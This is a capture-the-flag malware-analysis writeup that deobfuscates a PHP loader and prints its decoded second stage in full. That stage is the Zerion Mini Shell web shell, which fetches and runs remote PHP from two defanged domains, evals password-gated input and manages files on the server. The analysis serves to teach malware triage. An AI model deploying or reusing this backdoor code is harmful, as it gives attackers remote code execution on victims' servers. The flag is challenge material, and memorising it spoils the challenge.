huntress2023

Writeups for Huntress CTF 2023

✅ MALWARE - Zerion

Writeup by: @goproslowyo

Tags

Files:

Description

Author: @JohnHammond

We observed some odd network traffic, and found this file on our web server… can you find the strange domains that our systems are reaching out to? NOTE, this challenge is based off of a real malware sample. We have done our best to “defang” the code, but out of abundance of caution it is strongly encouraged you only analyze this inside of a virtual environment separate from any production devices. Download the file(s) below.

Writeup

We get an obfuscated PHP script. Let’s try to clean it up:

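<?php
    // "Pz4=" decodes to "?>": the file is split at its closing tag, so index 1 is the blob that follows it
    $L66Rgr = explode(base64_decode("Pz4="), file_get_contents(__FILE__));
    // "L3gvaQ==" is "/x/i" and "eA==" is "x"; the third element is the decoded second stage
    $L6CRgr = array(base64_decode("L3gvaQ=="), base64_decode("eA=="), base64_decode(strrev(str_rot13($L66Rgr[1]))));
    // MD5 hash that the decoded stage compares submitted passwords against
    $L7CRgr = "d6d666e70e43a3aeaec1be01341d9f9d";
    // eval() runs the decoded stage; preg_replace and serialize only wrap that call
    preg_replace($L6CRgr[0],serialize(eval($L6CRgr[2])),$L6CRgr[1]);
    exit();
?>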

Interpolating some variables and decoding some base64 we’re left with:


After the closing ?> tag we can see the reversed, rot13’d, base64’d blob, which we can tackle with this CyberChef recipe.
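The same decoding chain can be reproduced statically. The Python below is an added example, not part of the original writeup: it mirrors the loader's explode / str_rot13 / strrev / base64_decode steps without evaluating anything, then lists the hosts and flag-shaped strings in the decoded stage. The sample file, the example.test hosts and all function names are constructed for this illustration.

```python
import base64
import codecs
import re

def extract_blob(sample: bytes) -> bytes:
    """Mirror explode("?>", file)[1]: the text after the first closing tag."""
    parts = sample.split(b"?>")
    if len(parts) < 2 or not parts[1].strip():
        raise ValueError("nothing after the closing PHP tag")
    return b"".join(parts[1].split())  # drop newlines and other whitespace

def decode_stage(blob: bytes) -> bytes:
    """Mirror base64_decode(strrev(str_rot13($blob))) without evaluating it."""
    unrotated = codecs.decode(blob.decode("ascii"), "rot13")
    return base64.b64decode(unrotated[::-1])

def indicators(decoded: bytes) -> dict:
    """Pull contacted hosts and flag-shaped strings out of the decoded stage."""
    hosts = {h.decode() for h in re.findall(rb"https?://([A-Za-z0-9.-]+)", decoded)}
    flags = [f.decode() for f in re.findall(rb"flag\{[0-9a-f]{32}\}", decoded)]
    return {"hosts": sorted(hosts), "flags": flags}

def _encode_stage(payload: bytes) -> bytes:
    """Inverse transform, used only to build the constructed sample below."""
    reversed_b64 = base64.b64encode(payload).decode("ascii")[::-1]
    return codecs.encode(reversed_b64, "rot13").encode("ascii")

# Constructed, harmless stand-in for the second stage (not the challenge payload).
CONSTRUCTED_PAYLOAD = (
    b"<?php $a = 'https://c.example.test/'; "
    b"$b = 'https://d.example.test/?flag=flag{" + b"0" * 32 + b"}';"
)
# Constructed sample file: an inert stub, the closing tag, then the encoded blob.
CONSTRUCTED_SAMPLE = (
    b"<?php /* constructed loader stub */ ?>\n"
    + _encode_stage(CONSTRUCTED_PAYLOAD) + b"\n"
)

if __name__ == "__main__":
    stage = decode_stage(extract_blob(CONSTRUCTED_SAMPLE))
    print(stage.decode())
    print(indicators(stage))
```

Because the loader hides its own "?>" literal behind base64, the only closing tag in the file is the real one, which is why a plain split on that tag isolates the blob.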

And if you look closely you should be able to spot your flag:


function GC($a)
{
    $url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $a, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']); $code = @file_get_contents($url); if ($code == false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'll'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 100); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $code = curl_exec($ch); curl_close($ch); }return $code;}
if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) { $code = GC('https://c.-wic5-.com/'); if(!$code){$code = GC('https://c.-oiv3-.com/?flag=flag{af10370d485952897d5183aa09e19883}
');}$need = '<'.'?'.'php'; if (strpos($code, $need) === false) { die('get failed'); } $file_name = tmpfile(); fwrite($file_name, $code); $a = stream_get_meta_data($file_name);$file_path = $a['uri']; $content = @file_get_contents($file_path);if(!$content){$file_path = '.c'; file_put_contents($file_path, $code);}@require($file_path); fclose($file_name);@unlink($file_path);die(); }
if (isset($_REQUEST['d_time'])){ die('{->'.$L7CRgr.'<-}'); }
$pass = false;
if (isset($_COOKIE['pass'])) { if(md5($_COOKIE['pass']) == $L7CRgr) { $pass = true; } } else { if (isset($_POST['pass'])) { if(md5($_POST['pass']) == $L7CRgr) { setcookie("pass", $_POST['pass']); $pass = true; } } }
if (isset($_POST['logout']) && $_POST['logout'] = 1) { setcookie("pass", null); $pass= false; }
if(isset($_REQUEST['pwd163']) && md5($_REQUEST['pwd163']) == $L7CRgr) {
    $a = base64_decode(rawurldecode((urlencode(urldecode($_REQUEST['zzz'])))));
    $need = base64_decode("PD9waHA=");
    if (strpos($a, $need) === false) { $a = $need . PHP_EOL . $a; }
    if (isset($_REQUEST['e'])){ $a = str_replace($need, "", $a); $b = 'e'.base64_decode("dmE=").'l'; $b($a);die(); }
    $file_name = tmpfile(); fwrite($file_name, $a);
    $require_params = stream_get_meta_data($file_name);
    @require($require_params['uri']);
    fclose($file_name);die(); }
if (isset($_REQUEST['auth_key'])){ die($L7CRgr); } if (!$pass) { if(!isset($_REQUEST['520'])) { header("HTTP/1.1 404 Not Found"); die();} echo '<form action="#" method="post"><input type="password" name="pass" > <input type="submit" value="submit"></form>'; die(); }


echo '<form action="#" method="post"><input type="hidden" name="logout" value="1"> <input type="submit" value="logout"></form>'; echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>Mini Shell</title>
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</HEAD>
<BODY>
<H1><center><img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
 Mini Shell <img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
 </center></H1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Direktori : '; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '<a href="?path=/">/</a>'; continue; } if($pat == '') continue; echo '<a href="?path='; for($i=0;$i<=$id;$i++){ echo "$paths[$i]"; if($i != $id) echo "/"; } echo '">'.$pat.'</a>/'; } echo '</td></tr><tr><td>';if(isset($_POST['path_create'])) {if(@mkdir($path.'/' . $_POST['path_create'])){echo '<font color="green">create success :* '.$path.'/' . $_POST['path_create'].'</font><br />';}else{echo '<font color="red">create failed :* '.$path.'/' . $_POST['path_create'].'</font><br />';}}if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '<font color="green">File Ter-Upload :* </font><br />'; }else{ echo '<font color="red">Upload gagal, Servernya kek <img src="http://c.fastcompany.net/asset_files/-/2014/11/11/4F4.gif"/>
 </font><br />'; } } echo '<form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</td></tr>
<tr><td><form enctype="multipart/form-data" method="POST">
Create Path : <input type="text" name="path_create" />
<input type="submit" value="create" />
</form></td></td>'; if(isset($_GET['filesrc'])){ echo "<tr><td>Current File : "; echo $_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '</table><br /><center>'.$_POST['path'].'<br /><br />'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],octdec($_POST['perm']))){ echo '<font color="green">Change Permission Done.</font><br />'; }else{ echo '<font color="red">Change Permission Error.</font><br />'; } } echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '<font color="green">Change Name Done.</font><br />'; }else{ echo '<font color="red">Change Name Error.</font><br />'; } $_POST['name'] = $_POST['newname']; } echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo '<font color="green">Edit File Done ~_^.</font><br />'; }else{ echo '<font color="red">Edit File Error ~_~.</font><br />'; } fclose($fp); } echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>'; } echo '</center>'; }else{ echo '</table><br /><center>'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '<font color="green">Delete Dir Done.</font><br />'; }else{ echo '<font color="red">Delete Dir Error.</font><br />'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo '<font color="green">Delete File Done.</font><br />'; }else{ echo '<font color="red">Delete File Error.</font><br />'; } } } echo '</center>'; $scandir = scandir($path); echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "<tr>
<td><a href=\"?path=$path/$dir\">$dir</a></td>
<td><center>--</center></td>
<td><center>"; if(is_writable("$path/$dir")) echo '<font color="green">'; elseif(!is_readable("$path/$dir")) echo '<font color="red">'; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>'; echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>"; } echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>'; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo "<tr>
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>"; if(is_writable("$path/$file")) echo '<font color="green">'; elseif(!is_readable("$path/$file")) echo '<font color="red">'; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>'; echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
<option value=\"edit\">Edit</option>
</select>

<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>"; } echo '</table>
</div>'; } echo '<center><br />Zerion Mini Shell <font color="green">1.0</font></center>
</BODY>
</HTML>'; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; }

The flag: flag{af10370d485952897d5183aa09e19883}